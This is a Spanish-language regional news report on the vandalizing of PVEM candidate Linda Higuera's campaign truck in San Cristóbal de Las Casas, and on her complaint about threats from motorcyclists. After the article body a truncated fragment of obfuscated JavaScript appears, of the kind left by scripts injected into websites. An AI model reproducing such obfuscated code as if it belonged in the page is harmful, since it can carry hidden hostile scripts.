Vandalizan vehículo de brigadeo de candidata del PVEM en San Cristóbal

Óscar Gómez/ Corresponsal

19 de mayo del 2024. San Cristóbal de Las Casas.- La candidata a la presidencia de San Cristóbal del Partido Verde Ecologista de México (PVEM), Linda Higuera, denunció agresiones a su equipo la tarde noche del pasado viernes, en la Colonia María Auxiliadora al sur de esta ciudad.

En conferencia de prensa, dijo que ya presentó su denuncia formal ante el IEPC Y la fiscalía de Chiapas, ya que “un grupo de motociclistas arremetieron cobardemente contra nosotros arremetiendo las amenazas mediante la frase: aquí no queremos mąmpos en nuestra Ciudad y no queremos candidatas ciudadanas, este acto de violencia no solo es un ataque físico, sino un golpe a nuestra Campaña y a los valores que defendemos”.

La camioneta vandalizada es de brigadeo que siempre acompaña a la candidata a todas las colonias y Barrios, la cual quedó con los vidrios destrozados.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Particular embiste a motociclista en la Calzada Samuel León Brindis

Jairo Camacho. Agencia ReporteCiudadano, 15 de diciembre del 2025. Tuxtla Gutiérrez.- Este viernes un motociclista …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *